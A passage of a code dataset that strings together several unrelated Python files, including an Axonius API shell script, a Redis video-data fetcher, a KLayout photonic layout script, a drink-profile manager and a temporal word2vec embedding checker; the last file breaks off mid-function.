=\\\n np.transpose(all_cross_corrs_max, axes=[1,0,2])\n filter_idx += filter_batch_size\n \n return to_return\n","sub_path":"deeplearn/scripts/modisco_util.py","file_name":"modisco_util.py","file_ext":"py","file_size_in_byte":10115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"419295991","text":"#!/usr/bin/env python -i\n# -*- coding: utf-8 -*-\n\"\"\"Utilities for this package.\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\n\nimport axonius_api_client as axonapi\n\nif __name__ == \"__main__\":\n axonapi.cli.cli_constants.load_dotenv()\n\n AX_URL = os.environ[\"AX_URL\"]\n AX_KEY = os.environ[\"AX_KEY\"]\n AX_SECRET = os.environ[\"AX_SECRET\"]\n AX_CLIENT_CERT_BOTH = os.environ.get(\"AX_CLIENT_CERT_BOTH\", None) or None\n AX_CLIENT_CERT_CERT = os.environ.get(\"AX_CLIENT_CERT_CERT\", None) or None\n AX_CLIENT_CERT_KEY = os.environ.get(\"AX_CLIENT_CERT_KEY\", None) or None\n\n def jdump(obj, **kwargs):\n \"\"\"JSON dump utility.\"\"\"\n print(axonapi.tools.json_reload(obj, **kwargs))\n\n ctx = axonapi.Connect(\n url=AX_URL,\n key=AX_KEY,\n secret=AX_SECRET,\n certwarn=False,\n cert_client_both=AX_CLIENT_CERT_BOTH,\n cert_client_cert=AX_CLIENT_CERT_CERT,\n cert_client_key=AX_CLIENT_CERT_KEY,\n log_level_console=\"debug\",\n log_level_api=\"debug\",\n log_console=True,\n )\n\n ctx.start()\n\n devices = ctx.devices\n users = ctx.users\n adapters = ctx.adapters\n enforcements = ctx.enforcements\n system = ctx.system\n","sub_path":"axonshell_manual.py","file_name":"axonshell_manual.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"350565549","text":"import sys\nfrom abstract_step import *\nimport copy\nimport csv\nimport glob\nimport os\nimport re\nimport yaml\n\nclass RawFileSources(AbstractSourceStep):\n\n '''\n The RawFileSources class acts as a tyemporary fix to get files into the pipeline.\n This source creates a run for every sample.\n\n Specify a file name pattern in *pattern* and define how sample names should be\n determined from file names by specifyign a regular expression in *group*.\n\n\n '''\n\n def __init__(self, pipeline):\n super(RawFileSources, self).__init__(pipeline)\n self.add_connection('out/raws')\n\n self.add_option('pattern', str,\n description = \"A file name pattern, for example \"\n \"``/home/test/fastq/Sample_*.fastq.gz``.\")\n\n self.add_option('group', str,\n description = \"A regular expression which is applied to found files, and which is \"\n \"used to determine the sample name from the file name. For example, \"\n \"``(Sample_\\d+)_R[12].fastq.gz``, when applied to a file called \"\n \"``Sample_1_R1.fastq.gz``, would result in a sample name of ``Sample_1``. \"\n \"You can specify multiple capture groups in the regular expression.\")\n\n self.add_option('paired_end', bool, description = \"Specify whether the samples are paired end or not.\")\n\n\n self.add_option('sample_id_prefix', str, optional = True,\n description = \"This optional prefix is prepended to every sample name.\")\n\n def declare_runs(self):\n regex = re.compile(self.get_option('group'))\n\n found_files = dict()\n\n # find files\n for path in glob.glob(os.path.abspath(self.get_option('pattern'))):\n match = regex.match(os.path.basename(path))\n if match == None:\n raise StandardError(\"Couldn't match regex /%s/ to file %s.\" % (self.get_option('group'), os.path.basename(path)))\n\n sample_id_parts = []\n if self.is_option_set_in_config('sample_id_prefix'):\n sample_id_parts.append(self.get_option('sample_id_prefix'))\n\n sample_id_parts += list(match.groups())\n sample_id = '_'.join(sample_id_parts)\n if not sample_id in found_files:\n found_files[sample_id] = list()\n found_files[sample_id].append(path)\n\n # declare a run for every sample\n for run_id, paths in found_files.items():\n with self.declare_run(run_id) as run:\n run.add_public_info(\"paired_end\", self.get_option(\"paired_end\"))\n for path in paths:\n run.add_output_file(\"raws\", path, [])\n\n\n\n","sub_path":"include/sources/raw_file_sources.py","file_name":"raw_file_sources.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"253004969","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nimport zipfile\n\npfx = \"mk_profile:\"\n\nVERSION_FILE = \"profile/version.txt\"\n\n\ndef update_version(logger):\n sd = get_server_data(logger)\n if sd is False:\n logger.error(\"Unable to complete without server data...\")\n return False\n\n # Update the profile version file with the info from server.json\n with open(VERSION_FILE, 'w') as outfile:\n outfile.write(sd['profile_version'])\n outfile.close()\n\n logger.info(pfx + \" done.\")\n\n\ndef profile_zip(logger):\n src = 'profile'\n abs_src = os.path.abspath(src)\n with zipfile.ZipFile('profile.zip', 'w') as zf:\n for dirname, subdirs, files in os.walk(src):\n # Ignore dirs starint with a dot, stupid .AppleDouble...\n if not \"/.\" in dirname:\n for filename in files:\n if filename.endswith('.xml') or filename.endswith('txt'):\n absname = os.path.abspath(os.path.join(dirname, filename))\n arcname = absname[len(abs_src) + 1:]\n logger.info('profile_zip: %s as %s' %\n (os.path.join(dirname, filename), arcname))\n zf.write(absname, arcname)\n zf.close()\n\n\ndef get_server_data(logger):\n # Read the SERVER info from the json.\n try:\n with open('server.json') as data:\n serverdata = json.load(data)\n except Exception as err:\n logger.error('get_server_data: failed to read {0}: {1}'.format('server.json',err), exc_info=True)\n return False\n data.close()\n # Get the version info\n try:\n version = serverdata['credits'][0]['version']\n except (KeyError, ValueError):\n logger.info('Version not found in server.json.')\n version = '0.0.0.0'\n # Split version into two floats.\n sv = version.split(\".\");\n v1 = 0;\n v2 = 0;\n if len(sv) == 1:\n v1 = int(v1[0])\n elif len(sv) > 1:\n v1 = float(\"%s.%s\" % (sv[0],str(sv[1])))\n if len(sv) == 3:\n v2 = int(sv[2])\n else:\n v2 = float(\"%s.%s\" % (sv[2],str(sv[3])))\n serverdata['version'] = version\n serverdata['version_major'] = v1\n serverdata['version_minor'] = v2\n return serverdata\n","sub_path":"rm_functions/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"288007699","text":"#coding=utf-8\nfrom rediscluster import StrictRedisCluster\nimport redis\nimport time\nimport datetime\n\ndef get_list(date):\n r = redis.Redis(host='10.200.131.27', port=6000, password='kji93tzs')\n key_prefix = 'headline_fresh_video_'\n all_video = set()\n filepath = '../normal_knn/jobs/data/video/video_list_' + date\n fw = open(filepath, 'w')\n key = key_prefix + date\n result = r.smembers(key)\n for i in result:\n if i not in all_video:\n all_video.add(i)\n fw.write(i + '\\n')\n fw.close()\n return all_video\n\ndef get_video_data(date):\n video_keys = get_list(date)\n redis_nodes = [{'host':'10.200.131.32','port':6101},{'host':'10.200.131.31','port':6102},{'host':'10.200.131.27','port':6101},{'host':'10.200.131.28','port':6102}]\n r = StrictRedisCluster(startup_nodes=redis_nodes)\n filepath = '../normal_knn/jobs/data/video/video_data_' + date\n fw = open(filepath, 'w')\n key_prefix = 'headline_'\n for v_key in video_keys:\n key = key_prefix + v_key\n video = r.get(key)\n if isinstance(video, basestring):\n fw.write(video + '\\n')\n fw.close()\n\ndef get_last_n_date(n):\n date_list = []\n now_time = datetime.datetime.now()\n for i in range(n-1):\n delta = -1 - i\n i_time = now_time + datetime.timedelta(days=delta)\n i_date = i_time.strftime('%Y%m%d')\n date_list.append(i_date)\n return date_list\n\nif __name__=='__main__':\n date_list = get_last_n_date(180)\n date_list = ['20170513', '20170514']\n for date in date_list:\n get_video_data(date)\n","sub_path":"doc_related_videos/get_data/get_video_file.py","file_name":"get_video_file.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"639627750","text":"#%% import dependencies\ncd_siepic = r\"C:\\Users\\mhammood\\Documents\\GitHub\\SiEPIC-Tools2\\klayout_dot_config\\python\"\ncd_pdk = r\"C:\\Users\\mhammood\\Documents\\GitHub\\SiEPIC-Tools2\\klayout_dot_config\\tech\\GSiP\"\npdk = 'GSiP'\n\nlayer_Si220 = 'Si'\nlayer_floorplan = 'FloorPlan'\nlayer_text = 'Text'\n#%% initialize imports\nimport sys, os\nsys.path.append(cd_siepic); sys.path.append(cd_pdk)\n\ntry:\n import pya\nexcept ImportError:\n import klayout.db as pya\n\nfrom pya import Box, Trans, CellInstArray, Point, DPoint, Path, DPath\n\nsys.path.append(cd_pdk+r\"\\pymacros\")\nfrom GSiP_Library import *\nGSiP()\nfrom SiEPIC.utils import arc_xy, get_technology_by_name\nfrom siepic_tools.utils.tech import Tech\nlib = get_technology_by_name(pdk, cd_pdk)\n#%%create layout\nly = pya.Layout()\ndbu = ly.dbu = 0.001\ncell_top = ly.create_cell(\"Top\")\nly.prune_subcells(cell_top.cell_index(), 1000)\n\n#%%Define Layer mapping and floor plan\nLayerSiN = ly.layer(lib[layer_Si220])\nfpLayerN = cell_top.layout().layer(lib[layer_floorplan])\nTextLayerN = cell_top.layout().layer(lib[layer_text])\n# Draw the floor plan\nly_height = 350\nly_width = 600\ncell_top.shapes(fpLayerN).insert(Box(0,0, ly_width/dbu, ly_height/dbu))\n\n#%%Import Grating couplers\nGC_imported = ly.create_cell(\"Grating_Coupler_13deg_TE_1550_Oxide\", pdk).cell_index()\nGC_pitch = 127\nt = Trans(Trans.R0, 0.5*ly_width/dbu, (0.5*ly_height-GC_pitch/2)/dbu)\ncell_top.insert(CellInstArray(GC_imported, t, DPoint(0,GC_pitch).to_itype(dbu), Point(0,0), 2, 1))\n\n#%%draw waveguide connecting grating couplers\npath = [[0.5*ly_width,0.5*ly_height-GC_pitch/2]] # start point\npath.append([0.5*ly_width+50,0.5*ly_height-GC_pitch/2])\npath.append([0.5*ly_width+50, 0.5*ly_height+GC_pitch/2])\npath.append([0.5*ly_width,0.5*ly_height+GC_pitch/2]) # end point\npath = DPath([DPoint(each[0], each[1]) for each in path],0.5)\npath = path.to_itype(dbu)\npts = path.get_points()\n\nwidths = [0.5]\nlayers = ['Waveguide']\noffset = [0]\nradius = 15\n\nfrom siepic_tools.utils.layout import layout_waveguide2\nlayout_waveguide2(lib, ly, cell_top, layers, widths, offset, pts, radius, False,0)\n\ncd_save = r\"C:\\Users\\mhammood\\Documents\\GitHub\\SiEPIC-Tools2\\Examples\\script_layouts\\gc_shunt\"\nos.chdir(cd_save)\nly.write(\"gc_shunt.gds\")\n\n# %%\n","sub_path":"Examples/script_layouts/gc_shunt/gc_shunt.py","file_name":"gc_shunt.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"647679099","text":"#!/usr/bin/env python3\n\"\"\"\nProgrammer: Chris Blanks\nLast Edited: 1/12/2019\nProject: Automated Self-Serving System\nPurpose: This script defines the Drink Class.\n\nNote:\n - The current code can only handle JPGs, so have to make it capable of more\n file types if the user will eventually be able to pull images from google images\n - Possible additions:\n *a pop up window that displays current drink profiles and related ingredients\n *a method for retrieving images from url (or really from anywhere)\n\"\"\"\n\nimport os\nimport pathlib\nimport shutil\n\n\nclass DrinkProfile:\n \n def __init__(self,drink_txt_file_path = None,main_directory=None):\n if main_directory == None:\n self.MAIN_DIRECTORY_PATH = \"\"\n else:\n self.MAIN_DIRECTORY_PATH = main_directory \n self.DRINK_PROFILE_DIRECTORY = self.MAIN_DIRECTORY_PATH +\"/resources/drink_profiles\"\n self.CONFIG_FILE_PATH = self.MAIN_DIRECTORY_PATH + \"/resources/system_info/config.txt\"\n\n self.drink_txt_file = drink_txt_file_path\n self.pic_extension = None\n self.isNewDrink = False\n \n #drink attributes that can be set by GUI\n self.id_number = None\n self.name = None\n self.ingredients = None\n self.pic_location = None\n self.isUrl = \"False\"\n self.isActive = \"1\"\n self.price = 0.0\n \n \"\"\"\n Note on self.edited_attributes:\n Changes in the values of this attribute will mean that the new value\n will replace the previous value in the text file for the drink profile.\n Each index corresponds to the drink attributes declared above in descending\n order, so index 0 is id_number and index 7 is price of the drinks\n \"\"\"\n self.edited_attributes = [0,0,0,0,0,0,0]\n \n self.checkIfNew()\n\n\n def checkIfNew(self):\n \"\"\"Checks to see if the drink object is a new drink option. If new then the isNewDrink boolean will be True\n until the instance's attributes are defined and the createDrinkProfile method is called on the instance.S\"\"\"\n if self.drink_txt_file == None:\n self.isNewDrink = True\n else:\n self.getDrinkProfile()\n\n\n def getDrinkProfile(self):\n \"\"\"Retrieves drink profile information from a subdirectory\"\"\"\n isNewPath = False\n lines = []\n \n with open(self.drink_txt_file,'r+',encoding=\"ISO-8859-1\") as file:\n line_count = 1\n for line in file:\n line = line.encode('utf8').decode('iso-8859-1')\n if line_count == 1:\n self.id_number = line.split()[1]\n if line_count == 2:\n self.name = line.split()[1].replace('_',' ')\n if line_count == 3:\n ingredient_list = line.split()\n self.ingredients = ingredient_list[1:len(ingredient_list)]\n if line_count == 4:\n pic_path = line.split()[1]\n paths = pic_path.split(\"/\")\n cur_dir_paths = (self.MAIN_DIRECTORY_PATH).split(\"/\")\n path_check_indx = len(cur_dir_paths)-1 #resources directory should always be longer\n if paths[:path_check_indx] == cur_dir_paths[:path_check_indx]:\n self.pic_location = line.split()[1] #same beginning path, so keep\n else:\n print(\"Paths seem to be different.\")\n if \".jpg\" in pic_path:\n self.pic_location = (self.drink_txt_file).replace(\".txt\",\".jpg\")\n isNewPath = True\n \n \n if line_count == 5:\n self.isUrl = line.split()[1]\n if line_count == 6:\n self.isActive = line.split()[1]\n if line_count == 7:\n self.price = line.split()[1]\n\n line_count += 1\n lines.append(line)\n if self.isUrl == \"False\":\n self.pic_extension = os.path.splitext(self.pic_location)[1]\n #if paths don't match up, rewrite old one\n if isNewPath == True:\n lines[3] = \"picture_location \" + self.pic_location + \"\\n\"\n with open(self.drink_txt_file,'w',encoding=\"ISO-8859-1\") as file:\n file.writelines(lines)\n\n\n def createDrinkProfile(self,desired_pic_path=None):\n \"\"\"Creates a new drink profile in the designated directory.\n *Functions as a callback for a GUI element after the instance's attributes are populated.\n *Drinks are by default active until changed to inactive in GUI.\"\"\"\n\n self.drink_profile_path = self.DRINK_PROFILE_DIRECTORY + \"/\" + self.name\n self.pic_location = self.drink_profile_path + \"/\" + self.name + self.pic_extension\n pathlib.Path(self.drink_profile_path).mkdir(exist_ok = True)\n os.chdir(self.drink_profile_path)\n \n new_name = self.name +\".txt\"\n with open(new_name,\"w\",encoding=\"ISO-8859-1\") as new_text_file :\n new_text_file.write(\"id_number \" + self.id_number+\"\\n\")\n new_text_file.write(\"name \" + self.name+\"\\n\")\n new_text_file.write(\"ingredients \" + self.ingredients+\"\\n\")\n new_text_file.write(\"picture_location \" + self.pic_location+\"\\n\")\n new_text_file.write(\"isUrl \" + str(self.isUrl)+\"\\n\")\n new_text_file.write(\"isActive \" + self.isActive+\"\\n\")\n new_text_file.write(\"Price \"+str(self.price)+ \"\\n\")\n \n if self.isUrl != \"False\":\n print(\"Somehow the impossible happened?\")\n print(self.isURL)\n pass #grab pic from url\n else:\n if desired_pic_path == None:\n pass \n elif os.path.exists(desired_pic_path):\n try:\n shutil.copyfile(desired_pic_path,self.pic_location)\n except IOError as e:\n print(\"Unable to copy file. %s\" %e)\n else:\n print(\"Desired path does not exist.\")\n \n self.isNewDrink = False\n \n os.chdir(self.MAIN_DIRECTORY_PATH)\n\n \n def editDrinkProfile(self):\n \"\"\"Edits an existing drink profile with the value change that was packed into the instance's\n edited_attributes attribute.\"\"\"\n attrib_indx = 0\n changes = []\n for attrib_change in self.edited_attributes:\n print(attrib_change)\n if attrib_change == 0:\n pass\n else:\n changes.append((attrib_indx + 1,attrib_change)) #attrib_indx must match line number\n attrib_indx +=1\n\n self.changeValuesInTextFile(changes) \n\n #reset edited_attributes\n for i in range(len(self.edited_attributes)):\n self.edited_attributes[i] = 0\n\n\n def changeValuesInTextFile(self,changes):\n \"\"\"Takes a tuple as input. The first parameter is the row number, and the second parameter\n is the new value.\"\"\"\n with open(self.drink_txt_file,'r+',encoding=\"ISO-8859-1\") as file:\n lines = file.read().splitlines()\n file.seek(0)\n \n line_headers = [\"id_number \",\"name \",\"ingredients \",\"picture_location \", \"isUrl \",\"isActive \",\"Price \"]\n line_count = 1\n for line in lines:\n for i in range(len(changes)):\n if line_count == changes[i][0]:\n line = line_headers[line_count - 1]+str(changes[i][1])\n print(line)\n if changes[i][0] == 4:\n self.acquireDesiredPic(changes[i][1]) #change picture\n file.write(line+\"\\n\")\n line_count +=1\n\n\n \n def deleteDrinkProfile(self):\n \"\"\"Deletes an existing drink profile \"\"\"\n self.name = (self.name).replace(' ','_')\n \n drink_profile_path = self.DRINK_PROFILE_DIRECTORY + \"/\" + self.name\n pic_location = drink_profile_path + \"/\" + self.name + self.pic_extension\n txt_file = drink_profile_path + \"/\" + self.name + \".txt\"\n \n os.remove(txt_file)\n os.remove(pic_location)\n os.rmdir(drink_profile_path)\n\n \n def addDrinkToConfig(self, path= None):\n \"\"\"Adds a drink to the configuration file for the main application if it is new.\"\"\"\n if path == None:\n path = self.CONFIG_FILE_PATH\n with open(path,\"r+\",encoding=\"ISO-8859-1\") as f:\n lines = f.read().splitlines()\n f.seek(0)\n \n line_number = 1\n for line in lines:\n if line_number == 2:\n occurences_indx = []\n start = 0\n while True:\n index_new = line.find(self.name,start)\n if index_new == -1:\n break\n start = index_new + len(self.name)\n occurences_indx.append(index_new)\n if not occurences_indx:\n line = line +\" \"+ self.name\n else:\n isNotARepeat = True\n for sub_indx in occurences_indx:\n if line.endswith(self.name) or line[ sub_indx + len(self.name)] == \" \":\n isNotARepeat = False\n if isNotARepeat:\n line = line +\" \"+ self.name + \" \"\n \n f.write(line+\"\\n\") #overwrites existing content\n line_number += 1\n\n\n def acquireDesiredPic(self,desired_pic_path):\n \"\"\"Acquires the desired pic and sets the pic_location attribute of the drink object.\"\"\"\n\n if \".jpg\" in desired_pic_path:\n self.pic_extension = \".jpg\" #setup extension\n elif \"png\" in desired_pic_path :\n self.pic_extension = \".png\" #setup extension\n\n if \" \" in self.name:\n self.name = (self.name).replace(\" \",\"_\")\n \n self.drink_profile_path = self.DRINK_PROFILE_DIRECTORY + \"/\" + self.name\n self.pic_location = self.drink_profile_path + \"/\" + self.name + self.pic_extension\n if desired_pic_path == self.pic_location:\n pass #nothing to change\n else:\n shutil.copyfile(desired_pic_path,self.pic_location)\n \n \n \n\n### Functions for testing DrinkProfile class' robustness\n\ndef testExistingDrink():\n \"\"\"Tests viewing the attributes of an existing drink profile.\"\"\"\n test_drink = DrinkProfile(self.DRINK_PROFILE_DIRECTORY+\"/cuba_libre/cuba_libre.txt\")\n\n print(test_drink.name,\"\\nId:\",test_drink.id_number,\"\\n\",test_drink.ingredients)\n print(test_drink.pic_location,\"\\n\",test_drink.isUrl,\"\\n\",test_drink.pic_extension)\n print(test_drink.price)\n\n\ndef testNewDrink():\n \"\"\"Tests creating a drink profile.\"\"\"\n test_drink2 = DrinkProfile()\n test_drink2.name = \"test_drink_2\"\n test_drink2.id_number = \"24\"\n test_drink2.ingredients = \"stuff ingredients nothing really\"\n test_drink2.isUrl = \"False\"\n test_drink2.pic_extension = \".jpg\"\n test_drink2.price = 5.99\n\n test_drink2.createDrinkProfile(\"/home/pi/Pictures/drink.jpg\") \n\n\ndef testAddingDrinkToConfig():\n \"\"\"Tests adding a drink name to the config file for the system.\"\"\"\n test_drink3 = DrinkProfile()\n test_drink3.name = \"vodka\"\n test_drink3.id_number = \"25\"\n test_drink3.ingredients = \"stuff ingredients nothing really\"\n test_drink3.isUrl = \"False\"\n test_drink3.pic_extension = \".jpg\"\n\n test_drink3.addDrinkToConfig(\"config_copy.txt\")\n\n\ndef testDeletingADrinkProfile():\n \"\"\"Tests deleting a drink profile.\"\"\"\n test_drink4 = DrinkProfile(self.DRINK_PROFILE_DIRECTORY+\"/Test_drink_2/test_drink_2.txt\")\n test_drink4.deleteDrinkProfile()\n\n\ndef testEditDrinkProfile():\n \"\"\"Tests editing a drink profile.\"\"\"\n test_drink5 = DrinkProfile(self.DRINK_PROFILE_DIRECTORY+\"/Test_drink_2/test_drink_2.txt\")\n test_drink5.id_number = \"100\"\n test_drink5.isActive = \"0\"\n test_drink5.price = 4.05\n \n test_drink5.edited_attributes[0] = test_drink5.id_number\n test_drink5.edited_attributes[6] = test_drink5.isActive\n test_drink5.edited_attributes[7] = test_drink5.price\n test_drink5.editDrinkProfile()\n print(test_drink5.edited_attributes)\n \n\nif __name__ == \"__main__\":\n #testExistingDrink()\n #testNewDrink()\n #testAddingDrinkToConfig()\n #testDeletingADrinkProfile()\n #testEditDrinkProfile()\n pass\n","sub_path":"build/lib/AutomatedDrinkDispensingSystem/DrinkProfile.py","file_name":"DrinkProfile.py","file_ext":"py","file_size_in_byte":12714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"576327137","text":"new_table='icons/new_table.png'\nopen_table='icons/open_table.png'\ndump_table='icons/dump_table.png'\nclose_table='icons/close_table.png'\nexit_application='icons/exit.png'\nadd_expense='icons/add_expense.png'\ngrouped_by_months='icons/grouped_by_months.png'\ngrouped_by_categories='icons/grouped_by_categories2_64p.png'\nlogin_required='icons/login_required3.png'\nlogin_successful='icons/login_successful3.png'","sub_path":"icon_paths.py","file_name":"icon_paths.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"563728275","text":"import torch\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom model import SkipGramModel,TimestampedSkipGramModel\nfrom data_reader import DataReader, Word2vecDataset,TimestampledWord2vecDataset\nimport json\n\nimport os\nimport argparse\nimport pickle\nimport numpy as np\n# from scipy.spatial import distance\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.manifold import TSNE\nfrom matplotlib import pyplot as plt\nfrom sys import platform\nif platform != \"darwin\":\n plt.switch_backend('agg')\n\n\n#coca 0 29 1990 - 2019\n#coha 0 199 1810 2009\n#arxiv 0 352 2007.4 - 2020.4\n# nyt 1987- 2007\n# nyt_yao 1986 - 2015\n\nyear_mapping = {\n # \"coha.txt.raw.token.decade-output\": ([(i-1810)//10 for i in range(1810, 2020, 10)],[str(i)+\"s\" for i in range(1810, 2020, 10)]),\n # \"coca.txt.raw.token.decade-output\": ([(i-1990)//10 for i in range(1990, 2020, 10)],[str(i)+\"s\" for i in range(1990, 2020, 10)]),\n # \"coca.txt.raw.token-output\": ([i-1990 for i in range(1990, 2020, 1)],[str(i) for i in range(1990, 2020, 1)]),\n # \"coha.txt.raw.token-output\": ([i-1810 for i in range(1810, 2009, 1)],[str(i) for i in range(1810, 2009, 1)]),\n # \"arxiv.txt.raw.token-output\": ([i for i in range(0, 352, 1)],[\"{}-{}\".format( i//12 +1991, i%12+1 ) for i in range(0, 352, 1)]) ,\n # \"nyt.txt.norm-output\": ([i-1987 for i in range(1987, 2007, 1)],[str(i) for i in range(1987, 2007, 1)]),\n # \"nyt_yao.txt-output\": ([i-1986 for i in range(1986, 2015, 1)],[str(i) for i in range(1986, 2015, 1)]),\n \"newsit.txt.norm-output\": ([i-2007 for i in range(2007, 2019, 1)],[str(i) for i in range(2007, 2019, 1)]),\n \"repubblica.txt.norm-output\": ([i-1984 for i in range(1984, 2019, 1)],[str(i) for i in range(1984, 2019, 1)]),\n\n}\n\n\n\n\n#word_sin word_cos word_mixed word_linear word_mixed_fixed\nparser = argparse.ArgumentParser(description='parameter information')\nparser.add_argument('--time_type', dest='time_type', type=str,default= \"word_mixed\", help='sin cos mixed others linear, sin, word_sin,word_cos,word_linear')\nparser.add_argument('--text', dest='text', type=str,default= \"coha.txt.train\", help='text dataset')\nparser.add_argument('--use_time', dest='use_time', default= 1, type=int, help='use_time or not')\nparser.add_argument('--output', dest='output', default= \"coha\" , type=str, help='output dir to save embeddings')\nparser.add_argument('--log_step', dest='log_step', default= 100 , type=int, help='log_step')\nparser.add_argument('--from_scatch', dest='from_scatch', default= 1 , type=int, help='from_scatch or not')\nparser.add_argument('--batch_size', dest='batch_size', default= 128, type=int, help='batch_size')\nparser.add_argument('--emb_dimension', dest='emb_dimension', default= 50 , type=int, help='emb_dimension')\nparser.add_argument('--add_phase_shift', dest='add_phase_shift', default= 0, type=int, help='add_phase_shift')\nparser.add_argument('--verbose', dest='verbose', default= 0, type=int, help='verbose')\nparser.add_argument('--lr', dest='lr', default= 0.01, type=float, help='learning rate')\nparser.add_argument('--do_eval', dest='do_eval', default= 1, type=int, help='verbose')\nparser.add_argument('--iterations', dest='iterations', default= 2, type=int, help='iterations')\nparser.add_argument('--years', dest='years', default= 30, type=int, help='years')\nparser.add_argument('--weight_decay', dest='weight_decay', default= 0, type=float, help='weight_decay')\nparser.add_argument('--time_scale', dest='time_scale', default= 1, type=int, help='time_scale')\nparser.add_argument('--min_count', dest='min_count', default= 25, type=int, help='min_count')\nparser.add_argument('--window_size', dest='window_size', default= 5, type=int, help='window_size')\n\nargs = parser.parse_args()\n\n\n\n\nif not torch.cuda.is_available():\n args.verbose = 1\n\n\n\nimport numpy as np\nimport heapq\nimport scipy \n\ndef keep_top(arr,k=3): \n smallest = heapq.nlargest(k, arr)[-1] # find the top 3 and use the smallest as cut off\n arr[arr < smallest] = 0 # replace anything lower than the cut off with 0\n return arr\n\n\ndef read_embeddings_from_file(file_name):\n embedding_dict = dict()\n with open(file_name,encoding=\"utf-8\") as f:\n for i,line in enumerate(f):\n if i==0:\n vocab_size,emb_dimension = [int(item) for item in line.split()]\n # embeddings= np.zeros([vocab_size,emb_dimension])\n else:\n tokens = line.split()\n word, vector = tokens[0], [float(num_str) for num_str in tokens[1:]]\n embedding_dict[word] = vector\n return embedding_dict\n\n\n\n\nclass Word2VecChecker:\n def __init__(self,path = \"output\",time_type = \"word_sin\"):\n # for time_type in os.listdir(path):\n # if \".DS_Store\" in time_type:\n # continue\n self.path = path\n subpath = os.path.join(path,time_type)\n if args.add_phase_shift:\n subpath += \"_shift\"\n if not os.path.exists(os.path.join(subpath,\"vectors.txt\")):\n print(\"cannot find vectors.txt in {}, try to find {}-th iteration\".format(subpath,args.iterations))\n subpath = os.path.join(subpath,str(args.iterations-1))\n if not os.path.exists(subpath):\n print(\"cannot load model from {}\".format(subpath))\n return\n self.embedding_dict = read_embeddings_from_file(os.path.join(subpath,\"vectors.txt\"))\n if args.use_time and \"word2vec\" not in time_type:\n self.skip_gram_model = TimestampedSkipGramModel(len(self.embedding_dict), args.emb_dimension,time_type = time_type, add_phase_shift=args.add_phase_shift) \n else:\n self.skip_gram_model = SkipGramModel(len(self.embedding_dict), args.emb_dimension)\n \n self.id2word = pickle.load(open(os.path.join(subpath, \"dict.pkl\"),\"rb\"))\n self.skip_gram_model.load_embeddings(self.id2word,subpath)\n\n\n\n\n # print(embeddings)\n def get_similar_words(self,words,year,k=3,word2id=None):\n if word2id is None:\n word2id = {value:key for key,value in self.id2word.items()}\n embeddings_vectors = self.get_embedding_in_a_year(self.embedding_dict.keys(),word2id=word2id,year =year)\n \n # embeddings_vectors = np.array( [vector for word,vector in embeddings])\n # all_words = [word for word,vector in embeddings]\n not_found_words = [word for word in words if word not in word2id]\n if len(not_found_words) > 0:\n print(\"do not find {}\".format(\" \".join(not_found_words)) )\n words_index = [word2id[word] for word in words if word in word2id]\n # print(words_index)\n\n selected_vectors = np.array( [embeddings_vectors[word] for word in words_index])\n \n a = np.dot(selected_vectors,embeddings_vectors.T)#/np.norm()\n # a = cosine_similarity(selected_vectors,embeddings_vectors)\n \n top_k = a.argsort()[:,-1*k:]#[::-1]\n # top_k = np.partition(a, -3)\n # print(top_k.shape)\n # print(top_k)\n\n words_str = [ \" \".join([self.id2word[word] for word in top_k_per_word[::-1]]) for top_k_per_word in top_k ]\n return words_str\n\n # ranks = np.argsort(a,axis = 0)\n # print(ranks.argmax(0))\n # print(a.squeeze())\n # print(a.squeeze().argmax())\n # print(a.argmax(1))\n # print(a)\n # exit()\n def word_change_rate(self,words, years = 30):\n vectors = []\n for year in range(years):\n word2id = {value:key for key,value in self.id2word.items()}\n embeddings_vectors = self.get_embedding_in_a_year(self.embedding_dict.keys(),word2id=word2id,year =year)\n \n # embeddings_vectors = np.array( [vector for word,vector in embeddings])\n # all_words = [word for word,vector in embeddings]\n\n words_index = [word2id[word] for word in words]\n # print(words_index)\n\n selected_vectors = np.array( [embeddings_vectors[word] for word in words_index])\n vectors.append(selected_vectors)\n \n \n for j in range(len(words)):\n change_rates = []\n for year in range(years):\n if year ==0 :\n cur_vector = vectors[year][j]\n else:\n \n # change_rate = np.dot(cur_vector,vectors[year][j])\n change_rate = scipy.spatial.distance.cosine(cur_vector,vectors[year][j])\n cur_vector = vectors[year][j]\n change_rates. append(change_rate)\n print(words[j],np.mean(np.array(change_rates)))\n print(change_rates)\n \n\n return\n\n def plot_words_in_many_years(self,words= None, years = [i for i in range(1977,2020,1)],word2id=None,name=\"image\"):\n if words is None:\n words = [\"president\" , \"reagan\", \"trump\", \"biden\", \"obama\",\"bush\",\"carter\",\"clinton\", \"ford\", \"nixon\"]\n # words = [\"weapon\" , \"nuclear\", \"energy\"]\n if word2id is None:\n word2id = {value:key for key,value in self.id2word.items()}\n vectors = []\n names = []\n for year in years:\n names.extend([\"{}-{}\".format(word,year) for word in words])\n embeddings = self.get_embedding_in_a_year(words,year,word2id)\n vectors.extend(embeddings)\n embed = TSNE(n_components=2).fit_transform(vectors)\n # print(embed.shape)\n\n plt.figure(figsize = (12,12))\n # from adjustText import adjust_text \n texts = []\n for i,point in enumerate(embed):\n plt.scatter(point[0],point[1],label =names[i])\n texts.append(plt.text(point[0],point[1], names[i],size =7))\n # 